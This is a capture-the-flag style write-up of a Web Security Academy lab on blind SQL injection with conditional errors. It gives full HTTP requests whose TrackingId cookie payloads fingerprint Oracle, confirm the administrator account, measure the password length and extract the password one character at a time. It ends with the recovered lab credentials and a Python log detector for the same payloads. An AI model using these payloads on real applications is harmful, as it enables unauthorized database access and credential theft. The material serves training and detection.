Blind SQL injection with conditional errors
Solution
Add the character "'" to the TrackingId cookie
___
GET /product?productId=2 HTTP/2
Host: 0a5b00cc041be896800208f50085009a.web-security-academy.net
Cookie: TrackingId=D9eXqSXSL7wYPT1N'; session=flJsYqmD0URwktxhaYoikCA54cH8FV7f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5b00cc041be896800208f50085009a.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Check that the database is Oracle
Payload:
TrackingId=D9eXqSXSL7wYPT1N'||(SELECT '' FROM dual)||'
___
GET /product?productId=2 HTTP/2
Host: 0a5b00cc041be896800208f50085009a.web-security-academy.net
Cookie: TrackingId=D9eXqSXSL7wYPT1N'||(SELECT '' FROM dual)||'; session=flJsYqmD0URwktxhaYoikCA54cH8FV7f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5b00cc041be896800208f50085009a.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Check that the users table exists
Payload:
TrackingId=D9eXqSXSL7wYPT1N'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
___
GET /product?productId=2 HTTP/2
Host: 0a5b00cc041be896800208f50085009a.web-security-academy.net
Cookie: TrackingId=D9eXqSXSL7wYPT1N'||(SELECT '' FROM users WHERE ROWNUM = 1)||'; session=flJsYqmD0URwktxhaYoikCA54cH8FV7f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5b00cc041be896800208f50085009a.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Check that the user administrator exists
Payload: TrackingId=D9eXqSXSL7wYPT1N'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
___
GET /product?productId=2 HTTP/2
Host: 0a5b00cc041be896800208f50085009a.web-security-academy.net
Cookie: TrackingId=D9eXqSXSL7wYPT1N'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'; session=flJsYqmD0URwktxhaYoikCA54cH8FV7f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5b00cc041be896800208f50085009a.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Check how long the password is
Password = 20 chars
Payload: TrackingId=D9eXqSXSL7wYPT1N'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
___
GET /product?productId=2 HTTP/2
Host: 0a5b00cc041be896800208f50085009a.web-security-academy.net
Cookie: TrackingId=D9eXqSXSL7wYPT1N'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'; session=flJsYqmD0URwktxhaYoikCA54cH8FV7f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5b00cc041be896800208f50085009a.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Brute-force the password using a "cluster bomb attack"
Password is: 070ca6clxnn890aczfjo
___
GET /product?productId=2 HTTP/2
Host: 0a5b00cc041be896800208f50085009a.web-security-academy.net
Cookie: TrackingId=D9eXqSXSL7wYPT1N'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'; session=flJsYqmD0URwktxhaYoikCA54cH8FV7f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5b00cc041be896800208f50085009a.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Log in as user: administrator
L: administrator
P: 070ca6clxnn890aczfjo
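
Detection side of the steps above, as an added example that is not part of the original write-up: a check that flags the TrackingId payload shapes shown here in request logs and reports when one client is getting both normal and error responses to conditional-error payloads. The record layout, the alphanumeric-token rule, the 200/500 status mapping and the names classify, analyze, probe and SAMPLE are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

TOKEN_OK = re.compile(r"[A-Za-z0-9]+")  # assumed shape of a legitimate TrackingId
SIGNALS = {
    "subquery": re.compile(r"\|\|\s*\(\s*select\b", re.I),
    "cond_error": re.compile(r"case\s+when\b.*\bthen\b.*\b1\s*/\s*0", re.I | re.S),
    "char_probe": re.compile(r"\bsubstr\s*\(\s*\w+\s*,\s*\d+\s*,\s*1\s*\)", re.I),
}
POSITION = re.compile(r"substr\s*\(\s*\w+\s*,\s*(\d+)\s*,", re.I)

def classify(value):
    """Return the signal names raised by one TrackingId cookie value."""
    value = unquote(value)
    if TOKEN_OK.fullmatch(value):
        return set()
    return {"bad_charset"} | {n for n, rx in SIGNALS.items() if rx.search(value)}

def analyze(records):
    """Aggregate flagged requests per client and spot the status-code oracle."""
    report = defaultdict(lambda: {"signals": set(), "positions": set(), "statuses": set()})
    for client, tracking_id, status in records:
        hits = classify(tracking_id)
        if not hits:
            continue
        entry = report[client]
        entry["signals"] |= hits
        entry["statuses"].add(status)
        entry["positions"] |= {int(p) for p in POSITION.findall(unquote(tracking_id))}
    for entry in report.values():
        # Conditional-error payloads answered with both 200 and 500 mean the
        # status code is leaking one bit of data per request.
        entry["oracle"] = "cond_error" in entry["signals"] and {200, 500} <= entry["statuses"]
    return dict(report)

def probe(pos, ch):
    # Constructed cookie value in the shape of the write-up's SUBSTR request.
    return ("D9eXqSXSL7wYPT1N'||(SELECT CASE WHEN SUBSTR(password,%d,1)='%s' THEN "
            "TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'" % (pos, ch))

# Constructed log records: (client address, TrackingId value, response status).
SAMPLE = [
    ("203.0.113.9", "D9eXqSXSL7wYPT1N", 200),
    ("198.51.100.4", "D9eXqSXSL7wYPT1N'", 500),
    ("198.51.100.4", "D9eXqSXSL7wYPT1N'||(SELECT '' FROM dual)||'", 200),
    ("198.51.100.4", probe(1, "a"), 200),
    ("198.51.100.4", probe(1, "0"), 500),
    ("198.51.100.4", probe(2, "7"), 500),
]
```

The number of distinct SUBSTR positions per client is a useful alert threshold, since a character-by-character extraction walks through every position of the value.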